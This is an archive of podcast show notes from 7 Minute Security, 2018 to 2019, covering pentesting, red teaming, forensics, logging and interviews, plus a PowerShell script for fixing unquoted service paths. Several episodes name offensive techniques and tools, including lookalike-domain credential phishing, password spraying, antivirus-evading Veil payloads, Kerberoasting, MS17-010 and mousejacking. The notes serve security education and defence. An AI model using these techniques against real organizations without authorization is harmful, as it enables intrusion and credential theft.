    This week we're talking about everybody's favorite topic: REPORT WRITING! Yay! The peasants rejoice! In the last few months I've seen a lot of reports from other companies, and here are a few key problems I see with them:

    1. Too long - overall these things are waaAAaAaaAayyyYYYYYYyyy too long. I see reports where the analyst has copied and pasted an entire Nessus report into the main report. Yikes. That makes these things weigh in at hundreds(!) of pages.
    2. Too techie - these reports look like they're written from one techie to another. Nothing wrong with that, really; however, in many cases the key person that needs to "get it" is a manager or C-level position who needs to understand the risks in plain English.
    3. No narrative - the reports are just a long laundry list of vulnerabilities without any context of how the pentest was conducted or which vulns should be fixed first.
    4. Weak remediation - most of the findings are accompanied by whatever remediation instructions are provided by the vuln-scanner or other tool. We can do better than this!

    How? Listen to today's episode :-).

    Oh, and don't forget to come to the next 7MS User Group meeting on Monday, April 22! Details here!


    7MS #357: 7 Minutes of IT and Security Tips Apr 11, 2019

    Today I'm launching an ongoing series called 7MOIST. It stands for:

    • 7
    • Minutes
    • of
    • IT
    • and
    • Security
    • Tips

    The wildest, craziest, nuttiest part of this series is that each episode will be 7 minutes long!

    I know, I know! You're saying, "Wait a sec, bub, isn't that why this podcast is called 7 Minute Security in the first place?" And yes, you'd be right.

    Basically, this is my way of going old school and getting back to my podcast "roots" by delivering an episode like we did before we had an intro jingle, interviews, sponsors, banter about hot cocoas or an outro song. Nothing but delicious content today, friends. Enjoy!

    Today's theme is:

    Windows command line shortcuts and tips: Creative ways to play with cmd

    Basically, you can do Windows Key + R then type cmd and Enter for quick access to command line.

    But let's do some more fun stuff. Wanna open a command window from the desktop and launch a command in one swoop? Try this:

    cmd /k

    For example:

    cmd /k ping 192.168.0.1

    The cmd /k part opens a command window, and then ping 192.168.0.1 can be whatever command you also want to run on the fly.

    And if you want to start programs and/or open files right from the command line, you can do that (in most cases) by just typing the program name, like:

    notepad

    Or, get really fancy and add a document name after the command. For example:

    notepad meow.txt

    If meow.txt doesn't exist, Notepad will simply ask you to create it!

    Finding files faster

    Call me crazy, but the Windows find/search feature sometimes doesn't find stuff that I know is there. So I still like using old school DOS commands for this. I might do something like:

    cd \
    dir /s *brian*.doc

    The dir stands for directory, and the /s tells the system to search recursively.

    See 7ms.us for the rest of today's show notes!


    7MS #356: Faster Hard Drive Forensics with CyLR and CDQR Apr 03, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    In today's episode I talk about some cool tools you can use to start a hard drive forensics investigation more quickly. Resources talked about on today's podcast include:

    • Forensics 101 - a talk I did for the 7MS user group in January

    • The Digital Forensics Survival Podcast is a FANTASTIC resource to learn more about forensics

    • CyLR works great to do quick live disk artifact-gathering on a suspect system, and then...

    • CDQR can step in and analyze the info you gathered with CyLR and spit out helpful reports to begin your investigation

    • YouTube video of the CyLR/CDQR creators demonstrating the tools and doing a live demo of artifact collection/analysis

    • Did you miss this week's mousejacking Webinar? Also, DIY $500 Pentest Lab - Part 2 is up on YouTube. And we've got a fun Webinar on MITRE ATT&CK coming up in May. Sign up here


    7MS #355: Mousejacking! Mar 27, 2019

    This episode is brought to you by Netwrix Auditor, which empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to downtime.

    In this episode, we talk about the Mousejacking attack, which allows someone with a crazy radio (or other similar device) to inject keystrokes into vulnerable keyboards and mice. Yikes!

    Not trying to be a doom and gloom guy here, but using this Mousejacking attack, pentesters/attackers could take over your entire Active Directory in just seconds - from the parking lot! I'll talk about how exactly that could be done - as well as ways to defend against mousejacking - in today's episode.

    If this episode primes your appetite for more Mousejackin' fun, join me and my pals Paul and Dan for a deep-dive Mousejacking Webinar on Tuesday, April 2 at 12 p.m. CST!

    Some resources talked about in today's episode:

    • Mousejack.com - great demo video of the attack

    • Crazy Radio PA - one hardware option to perform mousejacking attacks

    • Custom mousejacking firmware for Crazy Radio PA

    • Jackit - tool for conducting mousejack attacks

    • A cool Twitter thread on using mousejacking for pentests

    • Vulnerable devices - nice repository of devices known to be susceptible to mousejacking attacks


    7MS #354: Tales of Internal Pentest Pwnage - Part 2 Mar 25, 2019

    Today's episode is the thrilling, exciting, heart-pounding conclusion of Tales of Internal Pentest Pwnage - Part 1. In this episode, we cover the final "wins" that got me to Domain Admin status (and beyond!):

    • Got DA but can't get to your final "crown jewels" destinations? How about going after the organization's backups (evil grin!)

    • Got DA but stuck to find hot leads to where the crown jewels are? Get snoopy and go through people's files, folders and...bookmark caches! (evil grin #2!)

    • If your nmap/eyewitness scan turns up Web sites with simply an IIS default landing page or "It works!" Apache page on it, there's probably more there than meets the eye.

    We also talk about lessons learned from this pentest - both things done well and things the org can do to make the next pentester's job a lot harder.


    7MS #353: Tales of Internal Pentest Pwnage - Part 1 Mar 22, 2019

    Buckle up! This is one of my favorite episodes.

    Today I'm kicking off a two-part series that walks you through a narrative of a recent internal pentest I worked on. I was able to get to Domain Admin status and see the "crown jewels" data, so I thought this would be a fun and informative narrative to share. Below are some highlights of topics/tools/techniques discussed:

    Building a pentest dropbox

    The timing is perfect - my pal Paul (from Project7) and Dan (from PlexTrac) have a two-part Webinar series on building your own $500 DIY Pentest Lab, but the skills learned in the Webinars translate perfectly into making a pentest dropbox. Head to our webinars page for more info.

    Securing a pentest dropbox

    What I did with my Intel NUC pentest dropbox is build a few VMs as follows:

    • Win 10 pro management box with Bitlocker drive encryption and Splashtop (not a sponsor) which I like because it offers 2FA and an additional per-machine password/PIN. I think I spent $100/year for it.

    • Kali attack box with an encrypted drive (Kali makes this easy by offering you this option when you first install the OS).

    Scoping/approaching a pentest

    From what I can gather, there are (at least) two popular schools of thought as it relates to approaching a pentest:

    • From the perimeter - where you do a lot of OSINT, phish key users, gain initial access, and then find a path to privilege from there.

    • Assume compromise - assume that eventually someone will click a phishing link and give bad guys a foothold on the network, so you have the pentester bring in a Kali box, plug it into the network, and the test begins from that point.

    Pentest narrative

    For one of the tests I worked on, here were some successes and challenges I had along the way:

    Check out the show notes at 7MS.us as there's lots more good info there!


    7MS #352: Recap of Rad Red Team Training Mar 14, 2019

    I recently had the awesome opportunity to take the awesome Real World Red Team course put on by Peter Kim, author of The Hacker Playbook series.

    TLDR and TLDR (too long don't listen): go take this training. Please. Now. The end.

    If you want to hear more, check out today's podcast episode where I talk about all the wonderful tidbits I learned from Peter during the training, including:

    • Doppelganger attacks - does your target have a frequently used site like mail.company.com? Try buying up mailcompany.com with a copy of their email portal (using Social Engineer Toolkit), and the creds might come pouring in!

    • Get potential usable creds from old breaches (Adobe, Ashley Madison, LinkedIn, Spotify)

    • Password spraying is often really effective to get you your first set of creds - check out Spray or DomainPasswordSpray

    • When creating phishing payloads, Veil will help you craft something to bypass AV

    • When you're in a network and have grabbed your first set of creds, run BloodHound or SharpHound to map the Active Directory and find your high-value targets

    • Check systems for MS17-010 for some potential easy wins

    • Look for potential accounts that you can Kerberoast

    For more info visit today's show notes on 7ms.us


    7MS #351: Turn Windows Logging up to 11 Mar 06, 2019

    Today's episode is brought to you by NoteCast. Try it free for 60 days (no credit card required) and enter code 7MS when completing your signup.

    In today's episode, I talk about how the level of Windows server/client logging out of the box is...not really awesome. I then look at how we can create a GPO that turns logging "up to 11" using some free tools and cheat sheets.

    If you want to simulate this in your own lab by building out an Active Directory environment, check out part 1 of a Webinar series we've been working on called DIY $500 Pentest Lab, which helps you select hardware/software components you need to build a lab. Then coming up soon is part 2 where we'll build out a Windows 2012 server, promote it to a DC, join a couple clients to it, and prepare to start hacking!

    Once your AD and clients are set up, you can start slurping up their logs for free using a Papertrailapp account (not a sponsor). I went ahead and paid for a $7/mo plan so I could get 1GB of storage and a little longer log retention.

    Then, I used LOG-MD to audit a Windows workstation and get some great recommendations on what registry settings and security policy tweaks to make. Finally, I started turning this into a GPO so I could begin pushing out these settings en masse. My living/breathing document to capture all this information is in a new gist that I plopped here.


    7MS #350: Interview with Lewie Wilkinson of Pondurance Feb 20, 2019

    Today's featured interview is with Lewie Wilkinson, senior integration engineer at Pondurance. Pondurance helps customers improve their security posture by providing a managed threat hunting and response solution, including a 24/7 SOC. Lewie joined me via Skype to talk a lot about a topic I'm fascinated with: incident response! I had a slew of questions and topics I wanted to discuss, including:

    • Fundamentals of threat hunting

      • What is threat hunting?
      • What are the fundamentals to start mastering?
      • How can someone start developing the core skills to get good at it?
    • How can sysadmins/network admins, who have a busy enough time already just keeping the digital lights on, handle the mounting pressure to also shoulder security responsibilities as part of their job duties?

    • What training/cert options are good to build skills in threat hunting?

    • Let's say you know one of your users has clicked something icky and you suspect a compromised machine/creds. You pull the machine off the network and rebuild it. How do you know that you've found/limited the extent of the damage?

    • Are attackers on networks typically wiping logs on systems as they bounce around laterally?

    • Anything to add to the low-hanging hacker fruit list?

    • Why is it so critical to not just have logs, but have verbose logs with rich data you need in an investigation?

    • When does it make sense to outsource some security responsibilities to a third party?

    Learn more about Pondurance at their Web site and Twitter.


    7MS #349: Interview with Ameesh Divatia of Baffle Feb 14, 2019

    Today's featured interview is with Ameesh Divatia, cofounder and CEO at Baffle. Baffle offers an interesting approach to data protection that they call data-centric protection, and the idea is you need to protect information at the record level, not just the sort of traditional approach of "encrypt at rest" and call it good.

    Ameesh sat down with me to talk about a lot of high level data and security privacy concerns, specifically:

    • Data privacy - it seems like every 15 minutes there's yet another massive data breach. Why is this continuing to happen?
    • What are the basic security/privacy fundamentals that companies should be doing but, for whatever reason, are not?
    • GDPR
      • What does GDPR mean to the average person?
      • Why was it a data privacy wake-up call for so many?
      • Have there been any sizable fines issued thus far?
    • How can data that companies collect on us be processed in a way that doesn't compromise security?

    Learn more about Baffle at their Web site and Twitter.


    7MS #348: Cell Phone Security for Tweenagers Feb 06, 2019

    Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    This episode focuses on security for families/kids - specifically cell phone security for tweenagers. We hit a milestone in the 7MS household this year because my tweenage son got an iPhone, much to my...uhh...not excitement. So we decided to wrap the following technical and administrative controls around the phone to hopefully make it a pleasant experience for everybody:

    Technical
    • I really dig the Apple family sharing controls, which let you do things like:

      • Have the phone "sleep" at certain hours
      • Limit the total amount of screen time per day
      • Require you to authorize any apps that are downloaded
    • We turned on OpenDNS to help filter inappropriate content.

    • I also use UniFi access points, which allow you to create a separate wireless SSID with a voucher system enabled on it. That way, you can hand out vouchers to kids with a defined amount of access attached to it (like 1 hour or whatever you like). We use it as a reward once the kids' chores and homework are complete.

    Administrative

    For our tweenager with the phone, we wrote up an agreement about acceptable use of the phone - including guidelines around the device's physical security, passwords and PINs, appropriate content, etc. You can grab a copy here.


    7MS #347: Happy 5th Birthday to 7MS Jan 31, 2019

    Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Psst...my pals Paul and Dan are hosting a Webinar all about building your own pentest lab for ~$500. This is happening next Tuesday, Feb. 5 at 12 p.m. CST. Sign up here.

    Today I thought I'd kind of hit the reset/refresh button and give you a little background on:

    • My self-diagnosed job ADHD (check out my series on career guidance for the even longer version :-/)
    • The history of 7MS the podcast (inspired by 10 minute podcast)
    • How the podcast helped launch 7MS the business
    • The various resources 7MS has worked on to help you in your IT/security career, such as:
      • BPATTY - Brian's Pentesting and Technical Tips for You
      • A Slack channel full of cool security people who want to help you learn, and learn from others as well
      • Vulnerable VMs to help you practice hacking, such as Billy Madison and Tommy Boy

    Thinking about starting your own company? Come see me at Secure360 this summer for my talk called So You Want to Start a Security Company.


    7MS #346: Baby's First Red Team Engagement Jan 24, 2019

    WARNING: Today's episode is a bit of an experiment, and I hope you'll hang in there with me for it.

    I had the opportunity to do a week-long red team engagement, and so I recorded a little summary of the experience at the end of each day, and then pasted them all together to make today's episode.

    Listening back to the episode now, it sounds like I might belong on a funny farm. But I thought it would be fun to give you a first-hand account of the experience so you can share the stomach-twisting journey with me.


    7MS #345: Interview with Amber Boone Jan 16, 2019

    Coming up on Tuesday, January 22 I'll be doing a Webinar with Netwrix called 4 Ways Your Organization Can Be Hacked. It features a Billy Madison theme and pits evil Eric Gordon against sysadmin Billy Madison. Hope you'll join us - it'll be fun!

    Today I'm pleased to welcome Amber Boone to the program! She is an awareness builder for a cybersecurity vendor (insert dramatic music!), and Amber was gracious enough to help me pilot a new style of interview called 7 Minute Interviews with 7MS.

    I basically asked Amber a "serious" question about security, then a goofy one, then another serious, then another goofy...and so on and so forth until the 7 minutes was up.

    Amber answered important questions such as:

    • Would she rather fight 100 duck-sized horses, or 1 horse-sized ducks?

    • What basic security effort could orgs address without investing a huge amount of dollars and effort?

    • Would she rather be a giant hamster or a tiny rhinoceros?

    If you'd like to check out what Amber's doing online, check out her LinkedIn, her side project YourLegacies.com or follow Amber on Twitter.

    Interested in doing a 7 minute interview with 7MS? Head here.


    7MS #344: Announcing the 7MS User Group Jan 09, 2019

    I'd like to cordially invite you to the first-ever 7MS User Group meeting, coming up Monday, January 14th at 6 p.m.! You can attend physically, virtually or both! All the info you need is in today's podcast, as well as here. See you there!


    7MS #343: Interview with Dan DeCloss Jan 02, 2019

    Psssst! Wanna come to the first ever 7MS User Group meeting? It's coming up on January 14th. You can join in person or virtually! Head here for more information!

    Dan DeCloss (a.k.a. wh33lhouse on Slack and @PlexTracFTW on Twitter) joined me virtually in the studio to talk about his passion project, PlexTrac. Dan also shared his insight on all sorts of great topics, including:

    • How to bleed "purple" and get comfortable playing on both the attacking and defending side of the house

    • What areas are we failing in defending our networks - and what kind of things can we do make our networks more resilient?!

    • What's the biggest challenge you see on both the blue and red team side (spoiler alert: communication is super important!)?

    • How do you break into a cyber security position that requires X years of experience when you have zero experience (Dan offers a great tip: don't be intimidated by requirements on job postings...they're often excessive/unreasonable)

    • Ways to show security aptitude on your resume without necessarily having a bunch of experience:

      • Build a home lab
      • Create a blog
      • Bug bounties
      • Make a podcast
      • Get certs (or at least get enrolled in them)
    • Some history on PlexTrac and what inspired Dan to create it


    7MS #342: Interview with Matt McCullough Dec 27, 2018

    Matt McCullough (a.k.a. Matty McFly on Slack) joined me in the studio to talk about his wild and crazy path to security. He started literally with no technical experience, but through a lot of hard work, aggressive networking and taking advantage of educational and career opportunities, Matt now rocks a SOC job. Matt and I sat down to talk about a lot of good stuff:

    • How to start an IT career as "the family IT guy"

    • Leveraging a higher education (at places like Lake Superior College) to meet people of influence and start networking like a beast

    • Entry level sysadmin and helpdesk jobs are fun - great opportunities to make the most of the position, build your skills and stretch yourself outside your comfort zone

    • MSPs (Managed Service Providers) are another great way to see different clients/verticals/systems and the various requirements that go into supporting them. From there, look for opportunities to start securing those organizations, as many MSPs don't dabble heavily in the security realm.

    • If you're going to school for cybersecurity training, look for ways to leverage your status to get discounts on security training, such as with SANS

    • Competitions like CCDC are awesome. You're given a handful of servers that are full of vulnerabilities, and you essentially are tasked with defending a network against a professional group of pentesters/redteamers. You even have to deal with real-life "injections" (other random emergencies and mock customers to deal with) while you're in the thick of the battle!

    • Join local cyber clubs (or start your own)! Looking for a fun CTF to get started in a group setting? Try hacking the OWASP Juice Shop

    • Attend security conferences (or start your own)!

    ...more notes at 7MS.us!


    7MS #341: How to Fix Unquoted Service Paths Dec 19, 2018

    Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    In today's episode we talk about how to identify - and resolve - unquoted service paths. Maybe you've seen this pop up in your vulnerability scanner and aren't quite sure what the risk is or how to fix it - and maybe more importantly, how to fix it at scale if need be. That's the technical conundrum I faced this week, so I talk about some resources to help you identify this risk and get it out of your environment!

    And here's a gist I wrote that walks you through everything step by step:
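    The gist itself is not reproduced on this page. What follows is an added example, not Brian's gist and not 7MS code: a PowerShell script that finds services whose ImagePath contains spaces but is not wrapped in quotes (the finding your vulnerability scanner reports), shows the quoted path it would write instead, and rewrites the registry value on request. The function names and the ExeExists sanity check are this example's own; it must run in an elevated session because it reads and writes HKLM service keys.

```powershell
# Added example, not the gist from the episode. Finds services whose ImagePath
# has spaces but no surrounding quotes (the "unquoted service path" finding) and
# can rewrite the registry value with the executable quoted. Run elevated; the
# function names and the ExeExists check are this example's own, not a standard tool.

$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

function Get-UnquotedServicePath {
    # Emits one object per affected service: Name, current ImagePath, the proposed
    # FixedPath, and whether the executable that split points at actually exists.
    Get-ChildItem -Path $ServicesKey -ErrorAction SilentlyContinue | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        $path  = [string]$props.ImagePath
        if ([string]::IsNullOrWhiteSpace($path)) { return }
        # Already quoted, or no spaces anywhere: nothing to do
        if ($path.StartsWith('"') -or $path -notmatch ' ') { return }
        # Split at the first ".exe"; everything after it is treated as arguments
        if (-not ($path -match '^(?<exe>.+?\.exe)(?<args>\s.*)?$')) { return }
        $exe = $Matches['exe']
        if ($exe -notmatch ' ') { return }   # spaces only in the arguments are harmless
        # %SystemRoot%-style values are expanded only for the existence check
        $expanded = [Environment]::ExpandEnvironmentVariables($exe)
        [pscustomobject]@{
            Name      = $_.PSChildName
            ImagePath = $path
            FixedPath = '"' + $exe + '"' + $Matches['args']
            ExeExists = Test-Path -LiteralPath $expanded -PathType Leaf
        }
    }
}

function Repair-UnquotedServicePath {
    # Writes the quoted path back as REG_EXPAND_SZ so %SystemRoot%-style values keep
    # working. Supports -WhatIf, so the first pass in a change window can be a dry run.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(Mandatory, ValueFromPipeline)][pscustomobject]$Service)
    process {
        if (-not $Service.ExeExists) {
            # The ".exe" split did not land on a real file (e.g. a folder name containing
            # ".exe"); quoting that would break the service, so leave it for manual review.
            Write-Warning "$($Service.Name): executable not found for proposed split, skipping"
            return
        }
        $key = Join-Path $ServicesKey $Service.Name
        if ($PSCmdlet.ShouldProcess($Service.Name, "Set ImagePath to $($Service.FixedPath)")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $Service.FixedPath -Type ExpandString
        }
    }
}

# Report first, then dry-run the fix; drop -WhatIf to apply it.
Get-UnquotedServicePath | Format-Table -AutoSize
Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
```

    The existence check is the caveat worth keeping: the scanner finding only tells you the path is unquoted, and a careless regex split can quote the wrong prefix, so the repair refuses anything whose executable it cannot find. To handle the "at scale" case from the episode, wrap both functions in an Invoke-Command script block against your computer list and run the -WhatIf pass fleet-wide before the real one.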


    7MS #340: Forensics 101 Reloaded and The CryptoLocker Music Video Dec 13, 2018

    Last week I had the fun privilege of speaking twice at the Minnesota Government IT Symposium on the following topics:

    • Forensics 101: This was a "reloaded" talk that I started earlier this year (and covered in episode 299 and 300). At a high level, the talk covered:

      • Hunting malware with Sysinternals
      • Creating system images with FTKImager
      • Dumping memory with Volatility and ripping icky stuff out of memory images with their 1-2-3 punch article
      • Seeking out DNS tunneling/exfil using Security Onion
    • Pecha Kucha: this talk, which is in a 20x20 format, is part PSA about how to not click bad links, part cautionary tale (and music video!) about how the promise of a free burrito can ruin your business! Check out the video here, and special thanks to Joe Klein for providing the awesome pics to go along with the storyboard - you're a champ.

    Also, check out the Digital Forensics Survival Podcast which is awesome for learning more about forensics and IR.


    7MS #339: A Pulse-Pounding Impromptu Physical Pentest Dec 06, 2018

    On a recent security assessment I was thrown for a loop and given the opportunity to do a two-part physical pentest/SE exercise - with about 5 minutes notice(!). Yes, it had me pooping my pants, but in retrospect it was an amazing experience. This is the mission I was given:

    • See if you can get the front desk staff to plug in a USB drive - I posed as John Strand and armed myself with a fake resume. And as I approached the front desk I suddenly panicked and thought, "What if the front desk person is a BHIS fan?!?!?"

    • Break into a door with weak security and steal equipment - I was given a plastic shiv and asked to try and get into a secure area in the middle of a busy office morning. No pressure, right?

    Was I successful? Was I arrested? Find out in today's episode!


    7MS #338: SIEMple Tests for Your SIEM Solution Nov 28, 2018

    Today's episode talks about some SIEMple tests you can run on your SIEM (OMg see what I did there? I took the word simple and made it SIEMple. Genius stuff, right? And there's no extra charge for it!). And if you're just now starting to shop around for a SIEM, this episode also has an extensive questionnaire you can use to put your vendors' feet to the fire and see what they're made of! Along with today's episode, I'm releasing a companion gist that contains:

    • Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible

    • SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts

    Enjoy!


    7MS #337: Happy Secure Thanksgiving Nov 21, 2018

    Happy Thanksgiving! In this episode I:

    • Share some things I'm thankful for - like you!
    • Talk about a fun episode I'm working on that has some SIEMple tests you can use to test your SIEM (omg see what I did there? So clever)
    • Announce the 7MS user's group that will start meeting in the south metro area of Minnesota in January of 2019!
    • Tell you a story about a kid that peed his pants in front of me (you're welcome in advance)

    Hope you can take some time off and enjoy your friends/family this week and weekend. Have a blessed Thanksgiving!


    7MS #336: How to Succeed in Business Without Really Crying - Part 6 Nov 14, 2018

    Welcome to part 6 of our miniseries all about the ups, downs, trials and tribulations of being a small, one-person security start up. In this episode I detail out all the software/services I use to run 7 Minute Security, LLC in hopes it might help you run your company as well! I started a new gist to complement this episode, which you can get by clicking here. Enjoy!


    7MS #335: Cool Stuff I Just Learned From Red Teamers Nov 08, 2018

    Today I'm excited to brain-dump a bunch of cool stuff I learned at a red team conference called ArcticCon this week. Although this conference observes the Chatham House Rule, I'm just going to talk about a few things at a general, high level. Specifically, I asked several heavy-hitting red teams these burning questions:

    • When you red team an org, do you usually assume compromise (i.e. plug a Kali box into the network and go from there) or are you crafting email payloads from scratch, trying to get a reverse shell past various email/firewall filtering efforts?

    • Does your management seem to "get it" when it comes to the true value of having a red team? Or do they put limits on your efforts - like "Wait a sec, don't phish my boss!" Or "OMG hold on, don't pwn those systems!"


    7MS #334: IT Security Horrors That Keep You Up at Night Nov 01, 2018

    This week I got to celebrate Halloween with my friends at Netwrix by co-hosting a Webinar called IT Security Horrors That Keep You Up at Night. The content was a modified version of the Blue Team on a Budget talk I've been doing the past year or so, and essentially focuses on things organizations can do to better defend their networks without draining their budgets.

    The presentation had a Child's Play theme and showed Chucky trying to hack Andy's company via:

    • Phishing
    • Abusing bad domain passwords
    • Abusing bad local admin passwords
    • Responder attack
    • Lack of SMB signing

    Each attack was also followed up by some advice for how to stop it (or at least slow down its effectiveness).

    The presentation itself was a blast and I learned some good public speaking lessons as a result:

    • Get your slides done early! - when co-presenting, it makes sense that they want to see your slides sooner than the day of! :-)

    • Don't freak out about an audience of "none" - I always think Webinars are weird because you can't see people's faces or interpret their body language to get a feel for whether they appreciate your humor or understand the points you're trying to make. I learned you just gotta keep pushing forward "blind" whether you like it or not.

    • Set up a redundant presentation system - ok so file this one with the irrational fears dept, but I actually had a second laptop ready with my presentation loaded, and the laptop was connected to a cell hotspot I set up on a tablet. That way if my machine BSOD'd or Internet went out in my house, I could quickly rejoin the presentation and pick up where I left off. Safe or psycho? You decide!

    Happy belated Halloween!


    7MS #333: Pentesting Potatoes Oct 26, 2018

    This week I was in lovely Boise, Idaho doing some security assessment work. While I was there I got to hang out with Paul Wilch and some of the Project7 crew and picked up a lot of cool tools and tips I share in today's episode:

    • The Badger Infosec group did a cool Rubber Ducky demo.

    • Dan from DDSec did a demo of PlexTrac which is "the last cybersecurity reporting tool you will ever need." I'm actually going to use PlexTrac for my next few assessments and am working to line up a future interview with Dan to learn even more.

    • Paul gave a demo of Parrot which is cool and Kali-like. However, when Paul and I did a side-by-side test with Kali, we noticed that Parrot kind of barfed when it set out to do an Eyewitness report.

    • After meeting Paul's son, Simon, I'm optimistic about the future IT/security leaders in this country. There are some wicked-smart youth out there!

    • Paul gave me a hotel keycard lockpick/shiv (his own creation!) and staged a few doors for me to try and bypass. He made it interesting when he promised to throat-punch me if I failed! Thankfully, I got off without any throat punches!


    7MS #332: Low Hanging Hacker Fruit Oct 17, 2018

    In this episode I'm releasing a new document aimed at helping organizations eliminate low hanging hacker fruit from the environment. The document contains (relatively) cheap and (relatively) easy things to implement. And my hope is it can be a living/breathing document that will bulk up over time. Got things to add to this list? Then please comment on the gist below!


    7MS #331: How to Become a Packtpub Author - Part 3 Oct 10, 2018

    It's done! It's done!! It's DONE!!!

    That's right mom, my PacktPub course called Mastering Kali Linux Network Scanning is done!

    In today's episode I:

    • Recap the course authoring experience

    • Explain my super anal retentive editing process that takes 4 hours for every 10 minutes of produced video

    • Admit some last minute mistakes that about made me quit the whole project

    With the holidays coming up, this course is a perfect gift for that IT or security person in your life :-). Buy them a copy - or 10!

    Psst! I will soon be getting a handful of vouchers to the course that I can give away to podcast listeners. Interested in one? Ping me and I'll draw names from a virtual hat in a few weeks!


    7MS #330: Interview with Nathan Hunstad of Code42 Oct 03, 2018

    In today's episode, I'm excited to be joined in the studio by Nathan Hunstad, Director of Security at Code42. Nathan and I had a great chat about Code42's new security offering called Code42 Forensic File Search, which helps IT and security teams figure out where files are located across their enterprise - even if the endpoints are offline. This functionality lends itself to a number of interesting use cases and helps answer questions such as:

    • "Does known malware have, or has it ever had, a foothold in our environment?"

    • "Has a particular crypto-mining agent been installed on our employees’ computers? Who has it now?"

    • "What endpoints have or had copies of our company’s most sensitive files?"

    • "What files did an employee download or delete in the months before resigning?"

    • "What non-sanctioned collaboration applications are present in our environment?"

    After today's podcast, be sure to check out this great video of Nathan demonstrating the power of Code42 Forensic File Search live!

    Also talked about in today's episode:

    • Implementing host-based firewalls - here's a great blog and video on it

    I want to thank Code42 for their support of the 7 Minute Security podcast. It's a pleasure to work together with them to help companies be more secure!


    7MS #329: Active Directory Security 101 Sep 27, 2018

    Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin right in your browser here, and then try it in your environment free for 20 days! www.netwrix.com

    Welcome! Today I'm kicking off a new miniseries all about the fundamentals of Active Directory security. Rather than try to pile all the info into show notes, I'm going to start pumping everything into a living/breathing GitHub gist so we're all on the same page as this miniseries develops further. So, please feel free to check out that gist here.


    7MS #328: How to Succeed in Business Without Really Crying - Part 5 Sep 19, 2018

    This episode is a cavalcade of fun! Why?

    First, I've got a big announcement: I've accepted a new position.

    "What?!" exclaimed my mom. "I thought you were president of 7MS, what the what?"

    No worries, it's business as usual, and my responsibilities at 7MS aren't changing. But I'm also going to start writing blogs, nurturing a Slack channel and producing a podcast for somebody else each week. Tune in to find out who!

    Oh, and I also conclude this episode with a song from my band, Sweet Surrender. A few years ago we wrote a goofy song to start our shows called Sound Check, and in this episode, I wanted to debut the sequel to that song...called MANDATORY ENCORE. Enjoy.


    7MS #327: Interview with John Strand Sep 13, 2018

    Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin right in your browser here, and then try it in your environment free for 20 days! www.netwrix.com

    Well I'm geeking out big time because today I chatted with John Strand of Black Hills Information Security, SANS instructing, Security Weekly, Active Countermeasures, RITA and more. Some people think he looks like Wash from Serenity or Steve the Pirate from Dodgeball, and others get upset when they learn he's not John Strand the male model.

    I've followed John and his team's work since I got started in security, and they've been a huge inspiration for what I do at 7MS. If you're not watching the BHIS Webcasts stop what you're doing and subscribe now! They're all full of practical, hands-on security advice - often complemented by tools that are totally free!

    Anyway, enjoy today's interview where John and I talk about how to make pentesters' jobs harder, and why he'd rather be a security advisor to Katy Perry than Donald Trump.


    7MS #326: Interview with Ryan Manship and Dave Dobrotka Sep 06, 2018

    Today's episode is brought to you by my friends at Dashlane, a fantastic password manager for you, your family and your business! Head to www.dashlane.com/7ms and use the code 7MS for 10% off a year of Dashlane Premium!

    Today I'm super pumped to be joined by Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup. Both these guys lead red teams for a living and had a lot of great insight to share as it relates to:

    • The definition of "red teaming" and where it overlaps, if at all, with pentesting
    • Successfully running red team campaigns
    • Defending against a red team campaign
    • How to climb unclimbable walls
    • Is antivirus any good at stopping attackers?
    • The importance of 2FA and training your end-users
    • How to fool the "This email originated outside your organization" email banners
    • How to break into red teaming as a career
    • How to successfully break into a casino (or not)

    Other links and things mentioned in today's show:

    • RedTeam Security's awesome YouTube video on breaking into the US power grid

    • If you're a red teamer and in the Twin Cities area (or willing to drive a bit), you definitely want to sign up for ArcticCon coming up on October 23-24 at the Optum World Headquarters. Head to the link and sign up - if there are seats left!

    Once you listen to today's episode, please let me know if you'd like Ryan and Dave to come back for another interview. We were thinking it would be a blast to talk about the details of planning a red team engagement!


    7MS #325: Integrating Pwned Passwords with Active Directory - Part 2 Aug 30, 2018

    Today's episode is a follow-up to #304 where we talked about how you can integrate over 500 million weak/breached/leaked passwords from Troy Hunt's Pwned Passwords into your Active Directory.

    To get started with this in your environment, grab Troy's updated passwords list here, and then you can check out my BPATTY site for step-by-step implementation instructions.

    The big "gotchas" I discuss in today's episode are:

    • If users update their password to something on the Pwned Passwords list, they'll see the generic "Your password didn't meet policy requirements" message. In other words, the message they'll see is no different than when they pick a password that doesn't meet the default domain policy. So be careful! I'd recommend training the users ahead of pulling the trigger on Pwned Passwords.

